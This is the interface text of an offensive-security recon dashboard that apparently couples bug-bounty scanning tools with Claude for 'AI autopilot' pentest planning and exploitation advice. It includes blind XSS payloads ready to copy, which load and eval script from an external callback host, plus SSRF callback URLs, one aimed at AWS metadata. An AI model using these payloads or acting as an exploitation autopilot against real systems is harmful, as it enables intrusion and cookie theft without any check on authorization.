RazzkrHacks — AI Recon Agent

TARGET://

FULL

BASIC

SECURITY

SUBDOMAIN

SUBDOMAINS

DNS

PORTS

NUCLEI

WAYBACK

JS

XSS

SQLI

CLAUDE AI

LIVE TERMINAL IDLE

00:00:00[READY]System initialized — Welcome back, razzkr

00:00:00[READY]Claude AI connected — Haiku + Sonnet

00:00:00[READY]Nuclei v3.7.1 loaded

00:00:00[INFO]Enter target and press SCAN

OVERVIEW

VULNS 0

SUBS 0

PORTS 0

WAYBACK 0

JS 0

AI 0

REPORTS 0

Subdomains

0

found

Live Hosts

0

responding

Findings

0

vulns

Reports

0

AI written

O

NO SCAN RUNNING

Enter a target and press SCAN

!

NO VULNERABILITIES YET

*

NO SUBDOMAINS YET

O

NO PORT DATA YET

W

NO WAYBACK DATA

J

NO JS DATA YET

A

CLAUDE AI WAITING

R

NO REPORTS YET

SUBDOMAIN ENUMERATION

subfinder + assetfinder + crt.sh + shuffledns

NO RESULTS YET

PORT SCANNER

naabu fast port scanner

NO RESULTS YET

DIRECTORY BRUTEFORCE

AI-powered ffuf — Claude selects optimal wordlist based on tech stack

Upload WL

NO RESULTS YET

XSS SCANNER ENGINE

12-phase AI XSS engine — dalfox + kxss + XSStrike + blind XSS + WAF bypass

NO XSS FOUND YET

SQL INJECTION SCANNER

ghauri + NoSQLMap — MySQL, PostgreSQL, MongoDB injection

NO SQLI FOUND YET

JS ANALYSIS

hakrawler + jsluice — endpoints, API keys, secrets

NO JS DATA YET

WAYBACK URL MINING

waybackurls + gau — historical URLs, parameters

NO WAYBACK DATA

DNS ENUMERATION

dnsx + shuffledns — DNS records, bruteforce, zone transfer

NO DNS DATA YET

🔍

IDOR Hunter

Finds ID-based parameters and tests authorization flaws

🤖

AI IDOR Analysis

Claude AI analyzes findings and suggests exploitation steps

🔐

OAuth Scanner

Tests OAuth flows, redirect_uri, state parameter, token leakage

🎫

JWT Analyzer

Tests JWT none algorithm, weak secrets, algorithm confusion

🌐

CORS Checker

Detects CORS misconfigurations with evil origin testing

SCREENSHOTS

gowitness — visual recon of live hosts

NO SCREENSHOTS YET

SSRF SCANNER

AI-powered SSRF — SSRFmap + interactsh + VPS callback server

CALLBACK URLS

https://scan.razzkrhacks.com:8888/ssrf

https://scan.razzkrhacks.com:8888/ssrf/aws

NO SSRF RESULTS YET

BLIND XSS LIVE MONITOR

Real-time blind XSS callbacks — cookies, DOM, URLs captured

https://scan.razzkrhacks.com:8888/xss.js

XSS HITS

0

CALLBACK

:8888/xss.js

STATUS

CHECKING...

PAYLOADS - Click to copy

<script src="https://scan.razzkrhacks.com:8888/xss.js"></script>

"><script src="https://scan.razzkrhacks.com:8888/xss.js"></script>

<img src=x onerror=fetch('https://scan.razzkrhacks.com:8888/xss.js').then(r=r.text()).then(t=eval(t))>

*

NO HITS YET

Click REFRESH to load

SSRF CALLBACK MONITOR

Real-time SSRF detection — captures requests, headers, body

https://scan.razzkrhacks.com:8888/ssrf

SSRF HITS

0

CALLBACK

:8888/ssrf

USE FOR

SSRF/XXE/RFI

SSRF PAYLOADS - Click to copy

https://scan.razzkrhacks.com:8888/ssrf

https://scan.razzkrhacks.com:8888/ssrf/aws-metadata

http://[::]:8888/ssrf

*

NO SSRF HITS YET

Click REFRESH to check

CONFIGURATION

API settings, credentials

API CONFIGURATION

API Host

INSTALLED TOOLS

subfinder, assetfinder, httpx, naabu, nuclei, katana, jsluice, kxss, dalfox, ffuf, dnsx, shuffledns, gau, waybackurls, hakrawler, gowitness, crlfuzz, subjs, ghauri, XSStrike, NoSQLMap, SSRFmap, Gopherus

⚡ EXPLOIT SEARCH

Search CVEs, public exploits, PoCs and modules across 9 sources simultaneously

🤖 AI AUTOPILOT

Claude AI plans a full pentest strategy for your target

✦ AI ASSIST

Ask Claude anything — exploitation, reports, payloads, techniques

📋 PENTEST NOTES

🔍 AI CODE SECURITY REVIEW

Claude Sonnet analyzes source code for vulnerabilities — SQLi, XSS, secrets, auth flaws, IDOR patterns

PASTE CODE OR GITHUB RAW URL

FINDINGS

🔌 API RECON

Kiterunner + ffuf + API doc discovery + AI analysis

0

API Docs

0

Base Paths

0

KR Routes

0

ffuf Endpoints

📄 API DOCUMENTATION

No docs found yet

🔗 DISCOVERED ROUTES

No routes found yet

IDOR Scanner

OAuth / JWT / CORS Scanner